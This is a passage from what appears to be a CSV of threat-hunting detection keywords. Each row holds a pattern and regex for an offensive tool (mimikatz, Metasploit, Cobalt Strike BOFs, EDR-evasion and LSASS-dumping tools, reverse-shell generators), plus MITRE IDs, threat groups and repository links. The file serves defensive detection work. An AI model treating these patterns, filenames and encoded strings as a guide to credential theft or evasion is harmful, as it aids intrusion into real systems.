- T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/vysecurity/ANGRYPUPPY","1","1","N/A","10","10","306","84","2020-04-26T17:35:31Z","2017-07-11T14:18:07Z" "*-w *wordlists*.txt*",".{0,1000}\-w\s.{0,1000}wordlists.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1595 - T1133 - T1110 - T1027 - T1132 - T1048","TA0010 - TA0001 - TA0006 - TA0005 - TA0011","N/A","N/A","Network Exploitation Tools","https://github.com/OJ/gobuster","1","0","N/A","N/A","10","9022","1144","2024-04-29T21:27:59Z","2014-11-14T13:18:35Z" "*'W','i','n','d','o','w','s','\\','S','y','s','t','e','m','3','2'*",".{0,1000}\'W\',\'i\',\'n\',\'d\',\'o\',\'w\',\'s\',\'\\\\\',\'S\',\'y\',\'s\',\'t\',\'e\',\'m\',\'3\',\'2\'.{0,1000}","offensive_tool_keyword","DumpThatLSASS","Dumping LSASS by Unhooking MiniDumpWriteDump by getting a fresh DbgHelp.dll copy from the disk","T1003 - T1055.011 - T1027 - T1564.001","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/peiga/DumpThatLSASS","1","0","N/A","10","1","29","81","2022-09-24T22:39:04Z","2022-09-24T22:41:19Z" "*'W','i','n','d','o','w','s','\\','S','y','s','t','e','m','3','2',*",".{0,1000}\'W\',\'i\',\'n\',\'d\',\'o\',\'w\',\'s\',\'\\\\\',\'S\',\'y\',\'s\',\'t\',\'e\',\'m\',\'3\',\'2\',.{0,1000}","offensive_tool_keyword","killer","evade AVs and EDRs or security tools","T1564 - T1027 - T1070","TA0005","N/A","N/A","Defense Evasion","https://github.com/0xHossam/Killer","1","0","N/A","10","7","N/A","N/A","N/A","N/A" "*W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQw==*",".{0,1000}W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQw\=\=.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","N/A","9","4","N/A","N/A","N/A","N/A" "*W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkVDQg==*",".{0,1000}W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkVDQg\=\=.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","N/A","9","4","N/A","N/A","N/A","N/A" "*W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuUGFkZGluZ01vZGVdOjpaZXJvcw==*",".{0,1000}W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuUGFkZGluZ01vZGVdOjpaZXJvcw\=\=.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","N/A","9","4","N/A","N/A","N/A","N/A" "*W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuUGFkZGluZ01vZGVdOjpBTlNJWDkyMw==*",".{0,1000}W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuUGFkZGluZ01vZGVdOjpBTlNJWDkyMw\=\=.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","N/A","9","4","N/A","N/A","N/A","N/A" "*W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuUGFkZGluZ01vZGVdOjpJU08xMDEyNg==*",".{0,1000}W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuUGFkZGluZ01vZGVdOjpJU08xMDEyNg\=\=.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","N/A","9","4","N/A","N/A","N/A","N/A" "*W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuUGFkZGluZ01vZGVdOjpQS0NTNw==*",".{0,1000}W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuUGFkZGluZ01vZGVdOjpQS0NTNw\=\=.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","N/A","9","4","N/A","N/A","N/A","N/A" "*W2F1dG9ydW5dDQpzaGVsbGV4ZWN1dGU9eTMyNHNlZHguZXhlDQppY29uPSVTeXN0ZW1Sb290JVxzeXN0ZW0zMlxTSEVMTDMyLmRsbCw0DQphY3Rpb249T3BlbiBmb2xkZXIgdG8gdmlldyBmaWxlcw0Kc2hlbGxcZGVmYXVsdD1PcGVuDQpzaGVsbFxkZWZhdWx0XGNvbW1hbmQ9eTMyNHNlZHguZXhlDQpzaGVsbD1kZWZhdWx0*",".{0,1000}W2F1dG9ydW5dDQpzaGVsbGV4ZWN1dGU9eTMyNHNlZHguZXhlDQppY29uPSVTeXN0ZW1Sb290JVxzeXN0ZW0zMlxTSEVMTDMyLmRsbCw0DQphY3Rpb249T3BlbiBmb2xkZXIgdG8gdmlldyBmaWxlcw0Kc2hlbGxcZGVmYXVsdD1PcGVuDQpzaGVsbFxkZWZhdWx0XGNvbW1hbmQ9eTMyNHNlZHguZXhlDQpzaGVsbD1kZWZhdWx0.{0,1000}","offensive_tool_keyword","EDRaser","EDRaser is a powerful tool for remotely deleting access logs & Windows event logs & databases and other files on remote machines.","T1070.004 - T1027 - T1564.001","TA0005 - TA0040 - TA0003","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/EDRaser","1","1","N/A","10","2","172","29","2024-04-06T17:42:40Z","2023-08-10T04:30:45Z" "*W2F1dG9ydW5dDQpzaGVsbGV4ZWN1dGU9eTMyNHNlZHguZXhlDQppY29uPSVTeXN0ZW1Sb290JVxzeXN0ZW0zMlxTSEVMTDMyLmRsbCw0DQphY3Rpb249T3BlbiBmb2xkZXIgdG8gdmlldyBmaWxlcw0Kc2hlbGxcZGVmYXVsdD1PcGVuDQpzaGVsbFxkZWZhdWx0XGNvbW1hbmQ9eTMyNHNlZHguZXhlDQpzaGVsbD1kZWZhdWx0*",".{0,1000}W2F1dG9ydW5dDQpzaGVsbGV4ZWN1dGU9eTMyNHNlZHguZXhlDQppY29uPSVTeXN0ZW1Sb290JVxzeXN0ZW0zMlxTSEVMTDMyLmRsbCw0DQphY3Rpb249T3BlbiBmb2xkZXIgdG8gdmlldyBmaWxlcw0Kc2hlbGxcZGVmYXVsdD1PcGVuDQpzaGVsbFxkZWZhdWx0XGNvbW1hbmQ9eTMyNHNlZHguZXhlDQpzaGVsbD1kZWZhdWx0.{0,1000}","offensive_tool_keyword","EternalHushFramework","EternalHush Framework is a new open source project that is an advanced C&C framework. Designed specifically for Windows operating systems","T1071.001 - T1132.001 - T1059.003 - T1547.001","TA0011 - TA0005 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/APT64/EternalHushFramework","1","0","N/A","10","10","3","0","2023-10-28T13:08:06Z","2023-07-09T09:13:21Z" "*w32-speaking-shellcode.asm*",".{0,1000}w32\-speaking\-shellcode\.asm.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*w32-speaking-shellcode.bin*",".{0,1000}w32\-speaking\-shellcode\.bin.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*w32-speaking-shellcode-eaf.bin*",".{0,1000}w32\-speaking\-shellcode\-eaf\.bin.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*w3af_gui*",".{0,1000}w3af_gui.{0,1000}","offensive_tool_keyword","w3af","w3af is a Web Application Attack and Audit Framework. The projects goal is to create a framework to help you secure your web applications by finding and exploiting all web application vulnerabilities.","T1190 - T1211 - T1220 - T1222 - T1247 - T1592","TA0001 - TA0002 - TA0003 - TA0007 - TA0011","N/A","N/A","Vulnerability scanner","https://w3af.org/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*WaaSMedicCapsule.dll*",".{0,1000}WaaSMedicCapsule\.dll.{0,1000}","offensive_tool_keyword","PPLmedic","Dump the memory of any PPL with a Userland exploit chain","T1003 - T1055 - T1564.001","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/itm4n/PPLmedic","1","1","N/A","8","4","317","34","2023-03-17T15:58:24Z","2023-03-10T12:07:01Z" "*WaaSMedicPayload.dll*",".{0,1000}WaaSMedicPayload\.dll.{0,1000}","offensive_tool_keyword","PPLmedic","Dump the memory of any PPL with a Userland exploit chain","T1003 - T1055 - T1564.001","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/itm4n/PPLmedic","1","0","N/A","8","4","317","34","2023-03-17T15:58:24Z","2023-03-10T12:07:01Z" "*WAF-bypass-Cheat-Sheet*",".{0,1000}WAF\-bypass\-Cheat\-Sheet.{0,1000}","offensive_tool_keyword","WAF-bypass-Cheat-Sheet","WAF/IPS/DLP bypass Cheat Sheet","T1210 - T1204 - T1061 - T1133 - T1190","TA0001 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/Bo0oM/WAF-bypass-Cheat-Sheet","1","1","N/A","N/A","5","410","64","2018-11-28T20:34:17Z","2018-11-28T19:34:02Z" "*wafw00f https://*",".{0,1000}wafw00f\shttps\:\/\/.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*wafw00f*",".{0,1000}wafw00f.{0,1000}","offensive_tool_keyword","wafw00f","To do its magic. WAFW00F does the following Sends a normal HTTP request and analyses the response. this identifies a number of WAF solutions. If that is not successful. it sends a number of (potentially malicious) HTTP requests and uses simple logic to deduce which WAF it is. If that is also not successful. it analyses the responses previously returned and uses another simple algorithm to guess if a WAF or security solution is actively responding to our attacks.","T1210.001 - T1190 - T1589","TA0007 - TA0002 - TA0008","N/A","N/A","Defense Evasion","https://github.com/EnableSecurity/wafw00f","1","1","N/A","N/A","10","4879","910","2024-03-26T20:24:24Z","2014-05-14T17:08:16Z" "*Waiting for rootkit response*",".{0,1000}Waiting\sfor\srootkit\sresponse.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking - persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","0","N/A","10","10","1709","211","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z" "*waleedassar/SimpleNTSyscallFuzzer*",".{0,1000}waleedassar\/SimpleNTSyscallFuzzer.{0,1000}","offensive_tool_keyword","SimpleNTSyscallFuzzer","Fuzzer for Windows kernel syscalls.","T1055.011 - T1218","TA0005 - TA0007","N/A","N/A","Discovery","https://github.com/waleedassar/SimpleNTSyscallFuzzer","1","1","N/A","7","2","114","22","2024-01-25T02:39:31Z","2022-03-12T10:16:30Z" "*wapiti -u*",".{0,1000}wapiti\s\-u.{0,1000}","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","0","N/A","N/A","10","979","159","2024-05-01T19:11:32Z","2020-06-06T20:17:55Z" "*wapiti.git*",".{0,1000}wapiti\.git.{0,1000}","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","10","979","159","2024-05-01T19:11:32Z","2020-06-06T20:17:55Z" "*wapiti.py*",".{0,1000}wapiti\.py.{0,1000}","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","10","979","159","2024-05-01T19:11:32Z","2020-06-06T20:17:55Z" "*wapiti3-*.tar.gz*",".{0,1000}wapiti3\-.{0,1000}\.tar\.gz.{0,1000}","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","10","979","159","2024-05-01T19:11:32Z","2020-06-06T20:17:55Z" "*wapiti3-*-any.whl*",".{0,1000}wapiti3\-.{0,1000}\-any\.whl.{0,1000}","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","10","979","159","2024-05-01T19:11:32Z","2020-06-06T20:17:55Z" "*wapiti3/bin*",".{0,1000}wapiti3\/bin.{0,1000}","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","10","979","159","2024-05-01T19:11:32Z","2020-06-06T20:17:55Z" "*wapiti-getcookie*",".{0,1000}wapiti\-getcookie.{0,1000}","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","10","979","159","2024-05-01T19:11:32Z","2020-06-06T20:17:55Z" "*wappalyzer.py*",".{0,1000}wappalyzer\.py.{0,1000}","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","10","979","159","2024-05-01T19:11:32Z","2020-06-06T20:17:55Z" "*warberry*",".{0,1000}warberry.{0,1000}","offensive_tool_keyword","warberry","WarBerryPi is a RaspberryPi based hardware implant that has the ability to go on stealth mode when used in acuiring informational data from a target network. especially useful during read teaming engagements. Its designed with a special feature that allows it to get the needed information within the shortest time possible. WarBerryPis scripts are designed in such way to avoid noise in the network as much as possible.","T1589 - T1539 - T1562","TA0002 - TA0003 - TA0007","N/A","N/A","Exploitation tools","https://github.com/secgroundzero/warberry","1","1","N/A","N/A","10","2217","291","2019-11-09T00:09:44Z","2016-05-10T16:25:03Z" "*warpzoneclient.cpp*",".{0,1000}warpzoneclient\.cpp.{0,1000}","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","1","N/A","N/A","4","332","47","2023-11-02T23:52:51Z","2023-06-10T03:30:59Z" "*warpzoneclient.exe*",".{0,1000}warpzoneclient\.exe.{0,1000}","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","1","N/A","N/A","4","332","47","2023-11-02T23:52:51Z","2023-06-10T03:30:59Z" "*warpzoneclient.exe*",".{0,1000}warpzoneclient\.exe.{0,1000}","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","1","N/A","N/A","4","332","47","2023-11-02T23:52:51Z","2023-06-10T03:30:59Z" "*warpzoneclient.sln*",".{0,1000}warpzoneclient\.sln.{0,1000}","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","1","N/A","N/A","4","332","47","2023-11-02T23:52:51Z","2023-06-10T03:30:59Z" "*warpzoneclient.vcxproj*",".{0,1000}warpzoneclient\.vcxproj.{0,1000}","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","1","N/A","N/A","4","332","47","2023-11-02T23:52:51Z","2023-06-10T03:30:59Z" "*washingtonP1974/Rev-Shell*",".{0,1000}washingtonP1974\/Rev\-Shell.{0,1000}","offensive_tool_keyword","Rev-Shell","Basic script to generate reverse shell payloads","T1055.011 - T1021.005 - T1560.001","TA0002 - TA0005 - TA0042 - TA0011","N/A","N/A","C2","https://github.com/washingtonP1974/Rev-Shell","1","1","N/A","3","10","27","1","2024-03-20T13:58:21Z","2024-03-20T13:37:12Z" "*wavestone-cdt/EDRSandblast*",".{0,1000}wavestone\-cdt\/EDRSandblast.{0,1000}","offensive_tool_keyword","EDRSandBlast","EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/wavestone-cdt/EDRSandblast","1","1","N/A","10","10","1361","264","2024-01-28T15:02:08Z","2021-11-02T15:02:42Z" "*wavestone-cdt/Invoke-CleverSpray*",".{0,1000}wavestone\-cdt\/Invoke\-CleverSpray.{0,1000}","offensive_tool_keyword","Invoke-CleverSpray","Password Spraying Script detecting current and previous passwords of Active Directory User","T1110.003 - T1110.001","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/wavestone-cdt/Invoke-CleverSpray","1","1","N/A","10","1","60","11","2021-09-09T07:35:32Z","2018-11-29T10:05:25Z" "*wavvs/nanorobeus*",".{0,1000}wavvs\/nanorobeus.{0,1000}","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","1","N/A","10","10","273","31","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z" "*waza1234*",".{0,1000}waza1234.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz exploitation default password","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*WazeHell/sam-the-admin*",".{0,1000}WazeHell\/sam\-the\-admin.{0,1000}","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078.002 - T1078","TA0003 - TA0008 - TA0002","N/A","N/A","Exploitation tools","https://github.com/WazeHell/sam-the-admin/tree/main/utils","1","1","N/A","N/A","10","959","191","2022-07-10T22:23:13Z","2021-12-11T15:10:30Z" "*wce -i 3e5 -s *",".{0,1000}wce\s\-i\s3e5\s\-s\s.{0,1000}","offensive_tool_keyword","wce","Windows Credentials Editor","T1003.002 - T1003.003 - T1558.001 - T1558.003 - T1110 - T1055.001","TA0006 - TA0005 - TA0002","N/A","N/A","Credential Access","https://www.kali.org/tools/wce/","1","0","N/A","8","4","N/A","N/A","N/A","N/A" "*wce*getlsasrvaddr.exe*",".{0,1000}wce.{0,1000}getlsasrvaddr\.exe.{0,1000}","offensive_tool_keyword","wce","Windows Credentials Editor","T1003.002 - T1003.003 - T1558.001 - T1558.003 - T1110 - T1055.001","TA0006 - TA0005 - TA0002","N/A","N/A","Credential Access","https://www.kali.org/tools/wce/","1","1","N/A","8","4","N/A","N/A","N/A","N/A" "*wce-master.zip*",".{0,1000}wce\-master\.zip.{0,1000}","offensive_tool_keyword","wce","Windows Credentials Editor","T1003.002 - T1003.003 - T1558.001 - T1558.003 - T1110 - T1055.001","TA0006 - TA0005 - TA0002","N/A","N/A","Credential Access","https://www.kali.org/tools/wce/","1","1","N/A","8","4","N/A","N/A","N/A","N/A" "*wce-universal.exe*",".{0,1000}wce\-universal\.exe.{0,1000}","offensive_tool_keyword","wce","Windows Credentials Editor","T1003.002 - T1003.003 - T1558.001 - T1558.003 - T1110 - T1055.001","TA0006 - TA0005 - TA0002","N/A","N/A","Credential Access","https://www.kali.org/tools/wce/","1","1","N/A","8","4","N/A","N/A","N/A","N/A" "*wcfrelayserver.py*",".{0,1000}wcfrelayserver\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","140","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" "*wcfrelayserver.py*",".{0,1000}wcfrelayserver\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*WCMCredentials.txt*",".{0,1000}WCMCredentials\.txt.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*wdextract *:\*\*.vdm*",".{0,1000}wdextract\s.{0,1000}\:\\.{0,1000}\\.{0,1000}\.vdm.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","391","60","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" "*wdextract *\mrt.exe*",".{0,1000}wdextract\s.{0,1000}\\mrt\.exe.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","391","60","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" "*WDExtract-master*",".{0,1000}WDExtract\-master.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","1","N/A","8","4","391","60","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" "*wdigest!g_fParameter_UseLogonCredential*",".{0,1000}wdigest!g_fParameter_UseLogonCredential.{0,1000}","offensive_tool_keyword","cobaltstrike","A Beacon Object File (BOF) for Cobalt Strike which uses direct system calls to enable WDigest credential caching.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - 